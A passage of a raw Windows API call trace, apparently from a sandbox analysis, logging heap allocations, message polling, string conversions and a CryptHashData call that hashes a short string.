(HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0230.365] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0230.365] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0230.365] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0230.365] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0230.365] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0230.365] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0230.365] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0230.365] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0230.365] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e775c8 [0230.365] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0230.365] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e775c8 | out: hHeap=0x970000) returned 1 [0230.365] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0230.365] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f48 [0230.365] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0230.365] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0230.365] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0230.365] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d10 | out: hHeap=0x970000) returned 1 [0230.365] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0230.365] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fe0 | out: hHeap=0x970000) returned 1 [0230.365] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0230.365] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0230.365] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510b8 [0230.365] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51130 [0230.365] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0230.365] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51190 [0230.365] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0230.366] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ac8 [0230.366] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511a8 [0230.366] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51100 [0230.366] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fe8 [0230.366] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51118 [0230.366] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0230.366] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e55098 [0230.366] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0230.366] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0230.366] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0230.366] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0230.366] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2e54f58, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0230.366] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0230.366] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0230.366] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0230.366] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0230.366] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51118 | out: hHeap=0x970000) returned 1 [0230.366] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0230.366] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0230.366] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51100 | out: hHeap=0x970000) returned 1 [0230.366] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511a8 | out: hHeap=0x970000) returned 1 [0230.366] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51268 [0230.366] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51208 [0230.366] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0230.366] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0230.367] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51220 [0230.367] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51208 | out: hHeap=0x970000) returned 1 [0230.367] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0230.367] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51268 | out: hHeap=0x970000) returned 1 [0230.367] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51100 [0230.367] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51100 | out: hHeap=0x970000) returned 1 [0230.367] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0230.367] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0230.367] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0230.367] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69ba8 [0230.367] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0230.367] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51100 [0230.367] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0230.367] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977ae8 [0230.367] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51118 [0230.367] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0230.367] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51268 [0230.367] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0230.367] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51298 [0230.367] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0230.367] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512b0 [0230.367] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0230.367] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512b0 | out: hHeap=0x970000) returned 1 [0230.367] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0230.367] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51298 | out: hHeap=0x970000) returned 1 [0230.367] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0230.368] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51268 | out: hHeap=0x970000) returned 1 [0230.368] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0230.368] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0230.368] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e55028 [0230.368] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51100 | out: hHeap=0x970000) returned 1 [0230.368] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0230.368] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51220 | out: hHeap=0x970000) returned 1 [0230.368] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0230.368] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51190 | out: hHeap=0x970000) returned 1 [0230.368] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51130 | out: hHeap=0x970000) returned 1 [0230.368] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510b8 | out: hHeap=0x970000) returned 1 [0230.368] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0230.368] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51058 | out: hHeap=0x970000) returned 1 [0230.368] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0230.368] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51280 | out: hHeap=0x970000) returned 1 [0230.368] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e698c8 [0230.368] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977b18 [0230.368] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512b0 [0230.368] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0230.368] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51118 | out: hHeap=0x970000) returned 1 [0230.368] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0230.368] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977ae8 | out: hHeap=0x970000) returned 1 [0230.368] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ba8 | out: hHeap=0x970000) returned 1 [0230.368] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0230.368] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51208 [0230.368] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51190 [0230.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0230.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69988 [0230.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977bd8 [0230.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fc8 [0230.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0230.369] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0230.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51268 [0230.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0230.369] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0230.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51058 [0230.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0230.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510b8 [0230.369] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0230.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e55098 [0230.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0230.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0230.369] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0230.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0230.369] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2e55108, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0230.369] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0230.369] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0230.369] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0230.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0230.369] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510b8 | out: hHeap=0x970000) returned 1 [0230.370] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0230.370] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e550a8 [0230.370] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fc8 | out: hHeap=0x970000) returned 1 [0230.370] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0230.370] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977bd8 | out: hHeap=0x970000) returned 1 [0230.370] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0230.370] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51190 | out: hHeap=0x970000) returned 1 [0230.370] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51268 | out: hHeap=0x970000) returned 1 [0230.370] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0230.370] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0230.370] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51058 | out: hHeap=0x970000) returned 1 [0230.370] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51208 | out: hHeap=0x970000) returned 1 [0230.370] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0230.370] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0230.370] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0230.370] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0230.370] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51190 [0230.370] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510b8 [0230.370] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0230.370] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04658 [0230.370] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0230.370] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0230.371] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04658 | out: hHeap=0x970000) returned 1 [0230.371] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0230.371] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e511d8 [0230.371] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0230.371] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0230.371] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0230.371] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0230.371] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0230.371] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2e51508, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0230.372] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51508 | out: hHeap=0x970000) returned 1 [0230.372] GetProcAddress (hModule=0x756e0000, lpProcName="CryptHashData") returned 0x756feef0 [0230.372] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0230.372] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0230.372] CryptHashData (hHash=0xa872d0, pbData=0x2e55028, dwDataLen=0x3, dwFlags=0x1) returned 1 [0230.372] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0230.372] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0230.372] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a88 | out: hHeap=0x970000) returned 1 [0230.372] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0230.372] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0230.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04690 | out: hHeap=0x970000) returned 1 [0230.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0230.373] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51538 [0230.373] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78bb8 [0230.373] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0230.373] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fe8 [0230.373] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0230.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0230.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0230.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78bb8 | out: hHeap=0x970000) returned 1 [0230.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51538 | out: hHeap=0x970000) returned 1 [0230.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0230.373] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0230.373] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fe8 [0230.373] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0230.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0230.373] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0230.373] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0230.373] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0230.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0230.373] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51538 [0230.373] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0230.373] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51568 [0230.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0230.373] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f5f8 [0230.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0230.374] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0230.374] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0230.374] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f800 [0230.374] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0230.374] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0230.374] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f800 | out: hHeap=0x970000) returned 1 [0230.374] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0230.374] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51550 [0230.374] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0230.374] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0230.374] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0230.374] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0230.374] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0230.374] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0230.374] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0230.374] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51550 | out: hHeap=0x970000) returned 1 [0230.374] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0230.374] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51370 [0230.374] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0230.374] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51550 [0230.374] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0230.374] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51580 [0230.374] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0230.374] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0230.374] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51388 [0230.374] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0230.374] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51598 [0230.374] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0230.375] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0230.375] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f5f8 | out: hHeap=0x970000) returned 1 [0230.375] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0230.375] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0230.375] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0230.375] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51430 [0230.375] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0230.375] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51448 [0230.375] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0230.375] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513a0 [0230.375] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0230.375] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0230.375] RtlAllocateHeap 